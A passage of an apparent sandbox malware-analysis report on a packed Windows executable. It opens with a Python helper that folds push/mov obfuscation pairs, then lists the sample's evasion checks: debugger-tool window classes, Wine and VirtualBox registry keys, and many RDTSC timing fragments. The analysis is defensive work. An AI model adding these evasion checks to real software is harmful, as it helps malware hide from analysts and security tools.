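The push/mov pairs listed above are a common packer idiom rather than real work: `push imm32; mov dword ptr [esp], reg` has exactly the effect of `push reg` (the immediate is dead the instant it is overwritten), `push reg; mov dword ptr [esp], imm32` is `push imm32`, and `push reg; ret` is an indirect `jmp reg`. The Python below is an added example written for this page, not Joe Sandbox code: it parses "Code function" lines in the form Joe Sandbox exports them (function id, the instruction pair, then the instruction's own address fused onto the text with no separator) and rewrites each pair to its canonical form, so a list like the one above collapses to ordinary pushes and jumps. One pair needs care: at 1_2_00DC8832 the register being stored is esp, and `mov [esp], esp` stores the already-decremented esp, which is not what `push esp` does (that pushes the pre-decrement value), so the normaliser flags that case instead of folding it.

```python
"""Fold the push/mov and push/ret obfuscation pairs listed in the report.
Added example (not Joe Sandbox code). SAMPLE_LINES are copied from the
report's Data Obfuscation section in Joe Sandbox's export format."""
import re

# "Code function: <func> <instructions><addr>"; the export fuses <addr> onto the
# text. The regex also accepts the "Code function <func>: ... (at <addr>)" form.
LINE_RE = re.compile(r"Code function:?\s*(?P<func>\d+_\d+_[0-9A-F]{8}):?\s+"
                     r"(?P<instr>.*?)\s*(?:\(at\s+)?(?P<addr>\d+_\d+_[0-9A-F]{8})\)?$")
PUSH_MOV_RE = re.compile(r"^push\s+(?P<dead>\S+);\s*mov\s+dword ptr \[esp\],\s*(?P<live>\S+)$")
PUSH_RET_RE = re.compile(r"^push\s+(?P<target>\S+);\s*ret$")

SAMPLE_LINES = [  # copied from the report; trailing address fused as in the export
    "Code function: 1_2_00DC88CC push 2178BFE9h; mov dword ptr [esp], edi1_2_00DC8A6C",
    "Code function: 1_2_00DB105F push edx; mov dword ptr [esp], 00000004h1_2_00DB117D",
    "Code function: 1_2_0093B035 push ecx; ret 1_2_0093B048",
    "Code function: 1_2_00DC8832 push edi; mov dword ptr [esp], esp1_2_00DC8866",
    "Code function: 1_2_00C679D3 push eax; mov dword ptr [esp], 7FFE24CEh1_2_00C67A10",
]


def normalize(instr: str) -> str:
    """Return the single instruction the pair is equivalent to, or the input
    unchanged when no known pattern applies."""
    m = PUSH_MOV_RE.match(instr)
    if m:
        live = m.group("live").lower()
        if live == "esp":
            # mov [esp], esp stores esp AFTER the push decremented it; 'push esp'
            # would store the pre-decrement value, so the pair is not push esp.
            return "push (esp-4)  ; NOT push esp"
        return f"push {m.group('live')}"   # the first push's operand is dead
    m = PUSH_RET_RE.match(instr)
    if m:
        return f"jmp {m.group('target')}"  # push X; ret == jmp X, stack-neutral
    return instr


def parse_line(line: str):
    """Split a report 'Code function' line into (function, instructions, address)."""
    m = LINE_RE.search(line)
    if not m:
        raise ValueError(f"unrecognised line: {line!r}")
    return m.group("func"), m.group("instr"), m.group("addr")


def deobfuscate(lines) -> list:
    """[(function, address, original pair, canonical form)] for each line."""
    out = []
    for line in lines:
        func, instr, addr = parse_line(line)
        out.append((func, addr, instr, normalize(instr)))
    return out


if __name__ == "__main__":
    for func, addr, instr, canon in deobfuscate(SAMPLE_LINES):
        print(f"{func} @ {addr}: {instr:44} -> {canon}")
```

The same rewrite is what a disassembler plugin would do before decompiling: once the pairs are folded, the "arithmetic instruction to all instruction ratio 1.0" that the entry-point heuristic flagged drops back to something readable, and the real control flow of the unpacking stub becomes visible.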

                Boot Survival

Source: C:\Users\user\Desktop\file.exe; Window searched: window name: FilemonClass (twice)
Source: C:\Users\user\Desktop\file.exe; Window searched: window name: PROCMON_WINDOW_CLASS (twice)
Source: C:\Users\user\Desktop\file.exe; Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe; Code function 1_2_00939860: a long run of GetProcAddress calls, five LoadLibraryA calls, then further GetProcAddress calls (API resolution by name)

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe; Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_1-13244)
Source: C:\Users\user\Desktop\file.exe; Key opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe; Key opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF247F, second address CF248A, instructions: rdtsc; pushad; push eax; pop eax; push edx; pop edx; pushad; popad; push eax; push edx; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF248A, second address CF24B9, instructions: rdtsc; pop edx; pop eax; popad; jmp 00007F699913D300h; pop edx; pop eax; push eax; push edx; jmp 00007F699913D306h; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF24B9, second address CF24C6, instructions: rdtsc; push eax; jnc 00007F6999135DE6h; pop eax; pushad; push eax; push edx; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF24C6, second address CF24DF, instructions: rdtsc; pop edx; pop eax; jmp 00007F699913D303h; push eax; push edx; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF2762, second address CF2766, instructions: rdtsc; pop edx; pop eax; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF2766, second address CF2776, instructions: rdtsc; jp 00007F699913D2F6h; jo 00007F699913D2F6h; pop edx; pop eax; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF2776, second address CF2780, instructions: rdtsc; push eax; push edx; js 00007F6999135DE6h; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF290E, second address CF2918, instructions: rdtsc; je 00007F699913D2F6h; pop edx; pop eax; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF2AA2, second address CF2AD8, instructions: rdtsc; pushad; jmp 00007F6999135DF7h; pushad; popad; jmp 00007F6999135DEDh; popad; push eax; push edx; jmp 00007F6999135DEAh; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF2C53, second address CF2C60, instructions: rdtsc; pop edx; pop eax; popad; push eax; push edx; jp 00007F699913D2F6h; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF5C51, second address CF5CA1, instructions: rdtsc; pushad; jmp 00007F6999135DECh; jmp 00007F6999135DF5h; popad; pop edx; pop eax; nop; xor edx, 20DCA12Fh; push 00000000h; jg 00007F6999135DF2h; push 953C198Fh; pushad; push eax; push edx; jng 00007F6999135DE6h; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF5CA1, second address CF5CB8, instructions: rdtsc; pushad; popad; pop edx; pop eax; push eax; push edx; jmp 00007F699913D2FFh; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF5CB8, second address CF5D04, instructions: rdtsc; pushad; popad; pop edx; pop eax; popad; add dword ptr [esp], 6AC3E6F1h; mov esi, dword ptr [ebp+122D19DAh]; push 00000003h; sub cl, 00000001h; push 00000000h; pushad; mov ebx, edx; mov edi, dword ptr [ebp+122D3719h]; popad; push 00000003h; mov esi, 695D5100h; push D2A67BD0h; push edx; push eax; push edx; jmp 00007F6999135DF8h; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF5D04, second address CF5D08, instructions: rdtsc; push eax; push edx; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF5D08, second address CF5D2A, instructions: rdtsc; pop edx; pop eax; pop edx; pop eax; pop edx; xor dword ptr [esp], 12A67BD0h; xor edi, 2D29AB7Ch; lea ebx, dword ptr [ebp+12447AADh]; mov ecx, edx; xchg eax, ebx; push eax; push edx; pushad; push eax; push edx; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF5D2A, second address CF5D3C, instructions: rdtsc; pop edx; pop eax; jmp 00007F699913D2FDh; popad; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF5D8C, second address CF5D95, instructions: rdtsc; pop edx; pop eax; popad; push eax; push edx; push eax; push edx; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF5D95, second address CF5D99, instructions: rdtsc; pop edx; pop eax; rdtsc
Source: C:\Users\user\Desktop\file.exe; RDTSC instruction interceptor: first address CF5D99, second address CF5E01, instructions: rdtsc; jmp 00007F6999135DF1h; pop edx; pop eax; popad; mov dword ptr [esp], eax; push edx; call 00007F6999135DF4h; or ecx, 6DCE424Fh; pop esi; pop edx; mov dword ptr [ebp+122D1926h], esi; push 00000000h; jmp 00007F6999135DF3h; jng 00007F6999135DECh; xor dword ptr [ebp+122D1A95h], edx; push B0E0DCABh; push eax; push edx; push eax; push edx; push eax; pop eax; rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5E01 second address: CF5E07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5E07 second address: CF5E0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5EE6 second address: CF5FA4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F699913D2FCh 0x0000000c popad 0x0000000d push eax 0x0000000e ja 00007F699913D2FAh 0x00000014 push esi 0x00000015 push edx 0x00000016 pop edx 0x00000017 pop esi 0x00000018 nop 0x00000019 jmp 00007F699913D305h 0x0000001e push 00000000h 0x00000020 push CFA907EFh 0x00000025 jmp 00007F699913D309h 0x0000002a add dword ptr [esp], 3056F891h 0x00000031 jmp 00007F699913D301h 0x00000036 push 00000003h 0x00000038 cld 0x00000039 push 00000000h 0x0000003b mov edx, dword ptr [ebp+122D376Dh] 0x00000041 push 00000003h 0x00000043 jmp 00007F699913D2FCh 0x00000048 push 90A89D00h 0x0000004d jmp 00007F699913D307h 0x00000052 add dword ptr [esp], 2F576300h 0x00000059 mov di, 8E49h 0x0000005d lea ebx, dword ptr [ebp+12447AC1h] 0x00000063 mov ecx, 722B0825h 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e popad 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5FA4 second address: CF5FC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15004 second address: D15022 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F699913D2FAh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F699913D2F6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15022 second address: D15028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15028 second address: D15037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F699913D2F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15037 second address: D1503D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15379 second address: D1537F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1537F second address: D15383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15383 second address: D15387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15387 second address: D1539D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6999135DE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F6999135DE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1539D second address: D153A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1550B second address: D15511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D156E7 second address: D156EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D156EB second address: D156EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15B56 second address: D15B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F699913D2FAh 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEDF3B second address: CEDF41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEDF41 second address: CEDF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16A26 second address: D16A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6999135DF0h 0x00000009 jmp 00007F6999135DF8h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16A53 second address: D16A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F699913D306h 0x00000009 jp 00007F699913D2F6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16A73 second address: D16AA9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6999135DEEh 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F6999135DF2h 0x0000001b push eax 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16AA9 second address: D16AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16F32 second address: D16F4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b ja 00007F6999135DE6h 0x00000011 pop ecx 0x00000012 ja 00007F6999135DE8h 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE2117 second address: CE2132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D2FEh 0x00000009 popad 0x0000000a jo 00007F699913D307h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE2132 second address: CE2156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6999135DEBh 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6999135DF3h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B4E0 second address: D1B4E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE8D4D second address: CE8D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D232C1 second address: D232E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F699913D306h 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D232E6 second address: D232EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D238A1 second address: D238A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D238A5 second address: D238BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F6999135DEDh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D238BE second address: D238D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D2FDh 0x00000007 js 00007F699913D2F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D238D5 second address: D238DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6999135DE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D238DF second address: D238E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D238E3 second address: D238EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D238EC second address: D23903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F699913D2F8h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23903 second address: D23914 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6999135DECh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23914 second address: D2391E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24E2B second address: D24E44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6999135DEDh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24E44 second address: D24E4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2558D second address: D25591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25591 second address: D25597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25597 second address: D2559D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2563A second address: D25689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 xchg eax, ebx 0x00000006 push 00000000h 0x00000008 push edi 0x00000009 call 00007F699913D2F8h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], edi 0x00000013 add dword ptr [esp+04h], 0000001Ch 0x0000001b inc edi 0x0000001c push edi 0x0000001d ret 0x0000001e pop edi 0x0000001f ret 0x00000020 jmp 00007F699913D307h 0x00000025 push eax 0x00000026 pushad 0x00000027 jc 00007F699913D2F8h 0x0000002d push esi 0x0000002e pop esi 0x0000002f push eax 0x00000030 push edx 0x00000031 push edi 0x00000032 pop edi 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D259C4 second address: D259D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25A94 second address: D25A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27B01 second address: D27B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28F69 second address: D28F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28F70 second address: D29032 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6999135DE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F6999135DF0h 0x00000012 nop 0x00000013 mov esi, dword ptr [ebp+122D1AB3h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F6999135DE8h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 mov di, A7B1h 0x00000039 mov edi, dword ptr [ebp+122D272Dh] 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ebp 0x00000044 call 00007F6999135DE8h 0x00000049 pop ebp 0x0000004a mov dword ptr [esp+04h], ebp 0x0000004e add dword ptr [esp+04h], 0000001Ah 0x00000056 inc ebp 0x00000057 push ebp 0x00000058 ret 0x00000059 pop ebp 0x0000005a ret 0x0000005b mov di, E7AAh 0x0000005f jmp 00007F6999135DF5h 0x00000064 xchg eax, ebx 0x00000065 pushad 0x00000066 jmp 00007F6999135DEFh 0x0000006b jmp 00007F6999135DF5h 0x00000070 popad 0x00000071 push eax 0x00000072 js 00007F6999135E00h 0x00000078 push eax 0x00000079 push edx 0x0000007a push ebx 0x0000007b pop ebx 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AF50 second address: D2AF6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AF6F second address: D2AF73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2ED7F second address: D2EDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jmp 00007F699913D306h 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d jbe 00007F699913D302h 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30E3B second address: D30E41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30E41 second address: D30E52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F699913D2FDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3100C second address: D31011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32068 second address: D3206D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D33064 second address: D33068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D33F3A second address: D33FA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F699913D2FCh 0x0000000c popad 0x0000000d push eax 0x0000000e jne 00007F699913D309h 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F699913D2F8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f pushad 0x00000030 cld 0x00000031 add edi, 09420D5Ch 0x00000037 popad 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b pop ebx 0x0000003c push 00000000h 0x0000003e mov dword ptr [ebp+122D1F3Ch], edi 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 push ebx 0x00000048 push esi 0x00000049 pop esi 0x0000004a pop ebx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34F09 second address: D34F20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007F6999135DE6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F6999135DECh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34F20 second address: D34F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
